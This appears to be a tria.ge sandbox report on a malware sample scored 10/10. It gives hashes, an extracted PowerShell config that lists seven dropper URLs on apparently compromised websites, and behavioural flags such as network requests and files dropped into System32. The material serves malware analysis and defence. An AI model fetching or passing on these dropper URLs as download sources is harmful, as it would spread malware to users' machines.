Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    9f4f0ff572b38581d00b1c369d9cd56c_JaffaCakes118

  • Size

    177KB

  • Sample

    240611-x77ndayekm

  • MD5

    9f4f0ff572b38581d00b1c369d9cd56c

  • SHA1

    6141cd20ba2bb473769a301c1ade5a56ce330844

  • SHA256

    2bdb231a4e071c32f3734fa0ac5a13e5463ad6aea21e4a089fe1a1c69a56d372

  • SHA512

    d0bd93ccdbf3d2367b37610e96e5003cce4d86ccf073a212415c137682a1b7376802d64a35bd44913817038c713565af6ca24a395f3485e38fb15f27c4da4346

  • SSDEEP

    1536:GkPkfrdi1Ir77zOH98Wj2gpng9+a9AGnut1ExbYCYWOFBfM0jKCQ2g1:grfrzOH98ipg1uiX10+Cng1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://santyago.org/wp-content/0mcYS6/

exe.dropper

http://dandyair.com/font-awesome/rOOAL/

exe.dropper

https://www.tekadbatam.com/wp-content/AUiw/

exe.dropper

http://kellymorganscience.com/wp-content/SCsWM/

exe.dropper

https://tewoerd.eu/img/DALSKE/

exe.dropper

http://mediainmedia.com/plugin_opencart2.3-master/Atye/

exe.dropper

http://nuwagi.com/old/XLGjc/

Targets

    • Target

      9f4f0ff572b38581d00b1c369d9cd56c_JaffaCakes118

    • Size

      177KB

    • MD5

      9f4f0ff572b38581d00b1c369d9cd56c

    • SHA1

      6141cd20ba2bb473769a301c1ade5a56ce330844

    • SHA256

      2bdb231a4e071c32f3734fa0ac5a13e5463ad6aea21e4a089fe1a1c69a56d372

    • SHA512

      d0bd93ccdbf3d2367b37610e96e5003cce4d86ccf073a212415c137682a1b7376802d64a35bd44913817038c713565af6ca24a395f3485e38fb15f27c4da4346

    • SSDEEP

      1536:GkPkfrdi1Ir77zOH98Wj2gpng9+a9AGnut1ExbYCYWOFBfM0jKCQ2g1:grfrzOH98ipg1uiX10+Cng1

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks